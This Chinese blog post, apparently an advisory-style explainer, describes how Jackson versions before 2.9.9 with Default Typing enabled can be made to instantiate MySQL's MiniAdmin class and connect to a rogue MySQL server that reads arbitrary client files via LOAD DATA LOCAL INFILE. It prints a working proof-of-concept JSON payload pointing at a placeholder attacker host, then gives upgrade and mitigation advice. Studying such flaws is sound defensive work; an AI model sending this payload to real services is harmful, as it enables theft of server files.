java jackson漏洞_【Java进阶】Jackson安全漏洞，可导致服务器文件被恶意窃取

上周升级完Fastjson之后，去了解了下Jackson是否也有相关的漏洞。

果不其然，看到了一个issue

虽然这个issue是好几个月前的了，但是可能大家对Jackson比较不在意，以为国外的开源要牛逼一点，不会像Fastjson那么多问题，这里要纠正一点，fastjson之所以问题多，那是因为你接触的多，Jackson的问题其实也不少，只是你接触的少。 就拿这种issue的问题来说，这个漏洞也很严重，攻击者可以通过构造特殊的字符串，然后在特定条件下可以悄无声息的窃取你服务器上的文件数据。 可怕不？但是恐怕知道的人不多，很多服务还是依赖着低版本的Jackson，也没升级。 解释下到底是什么漏洞，这么危险！ 使用了Jackson 2.9.9之前的Java应用，如果服务依赖了mysql-connector-java，那么这个服务所在机器上的文件，就可能被任意读取走。 下面是具体原理分析。 先看下Json序列化对多态性的处理方式

public static class Person {

public String name;

public int age;

public Pet pet;

}

public static abstract class Pet {

public String name;

}

public static class Dog extends Pet {

public int age;

}

public static class Cat extends Pet {

}

ObjectMapper om = new ObjectMapper();

Person p = new Person();

p.name = "小黑";

p.age = 28;

Dog pet = new Dog();

pet.name = "小强";

pet.age = 2;

p.pet = pet;

System.out.println(om.writeValueAsString(p));

序列化之后

{"name":"小黑","age":28,"pet":{"name":"小强","age":2}}

序列化后类型消失，反序列化时因为Pet是抽象类，不知道该创建哪一个子类的对象。

但是Jackson提供了Default Typing，在开启的时候，可以序列化出更具体的类型。

ObjectMapper om = new ObjectMapper(); om.enableDefaultTyping();

得到的结果：

{"name":"小黑","age":28,"pet":["***.Dog",{"name":"小强","age":2}]}

所以，Jackson在开启Default Typing特性之后，就可以初始化一个具体的实例。

这个讲完之后，我们看下漏洞的最终元凶，MySQL的一个特殊用法：支持使用LOAD DATA LOCAL INFILE这样的语法，只要客户端连上某个MySQL服务，就可以把客户端本地文件的数据插入到这个MySQL的某个表中。

大概过程是这样的：用户在客户端输入：load data local infile "/data.csv" into table test;

客户端=>服务端：我想把我本地的/data.csv文件插入到test表中;

服务端=>客户端：把你本地的/data.csv发给我；

客户端=>服务端：/data.csv文件的内容；

这里有一个问题，客户端发送哪个文件的内容，取决于第3步，如果服务端是个恶意的MySQL服务，那么他可以读取客户端的任意文件，比如读取/etc/passwd：用户在客户端输入：load data local infile "/data.csv" into table test;

客户端=>服务端：我想把我本地的/data.csv文件插入到test表中;

服务端=>客户端：把你本地的/etc/passwd发给我；

客户端=>服务端：/etc/passwd文件的内容；

然后密码文件的内容就这样被嫖了。

引用MySQL官方文档如下：

In theory, a patched server could be built that would tell the client program to transfer a file of the server's choosing rather than the file named by the client in the LOAD DATA statement.

理论上，可以构建一个伪装服务器，它将告诉客户端传送一个服务指定的而不是通过客户端LOAD DATA语句指定的文件，意味着，我要什么，你就得给我什么，所以所有文件都可能泄露。

具体如何让服务中的MySQL客户端可以听我指挥，连到我预谋已久的MySQL服务呢？

首先，在MySQL的JDBC驱动中有一个创建连接的配置allowLoadLocalInfile，控制是否可以从本地读取文件，默认是可以的。

另外，不知道从哪个版本开始，MySQL的JDBC驱动多了一个类com.mysql.cj.jdbc.admin.MiniAdmin，可能没什么人用过，平时也用不到，但是它的牛逼之处在于可以创建一个到执行URL的JDBC连接。

public class MiniAdmin {

private JdbcConnection conn;

public MiniAdmin(String jdbcUrl) throws SQLException {

this(jdbcUrl, new Properties());

}

public MiniAdmin(String jdbcUrl, Properties props) throws SQLException {

this.conn = (JdbcConnection) (new Driver().connect(jdbcUrl, props));

}

...

}

想想，如果这个URL是我的那个伪装的MySQL服务，是不是就可以控制这个客户端轻松练上来，然后做一些不为人知的事情了。

事实上，确实可以。通过Jackson的反序列化特殊字符串，可以触发MiniAdmin的初始化，然后就在构造方法里创建一个到指定我MySQL服务的JDBC连接。

我们动手创建一个恶意的MySQL服务，可以使用https://github.com/Gifts/Rogue-MySql-Server，这个服务会读取客户端文件，并写入到mysql.log中。

启动服务，假设服务地址为：X.X.X.X.

ObjectMapper om = new ObjectMapper();

om.enableDefaultTyping();

String poc = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://X.X.X.X:3306/db\"]";

Object obj = om.readValue(poc, Object.class);

在客户端中执行如上代码，端口号和文件号在Rogue-MySql-Server中写死了，执行完之后，机器上的c:\windows\win.ini文件内容就会出现在mysql.log中。

在实际的生产环境中，可以通过往一些接受JSON参数的接口发送恶意的JSON数据来达成攻击的目的。

MySQL方面，从8.0.15开始将allowLoadLocalInfile默认值设置为false。

Jackson方面，从2.9.9版本开始，将com.mysql.cj.jdbc.admin.MiniAdmin加入反序列化黑名单：

怎么保护自己的系统

1、反序列化的坑，很大！需要尽量避免使用Object对象作为Jackson反序列化的目标。

2、序列化工具，该升级的要升级，不能拖！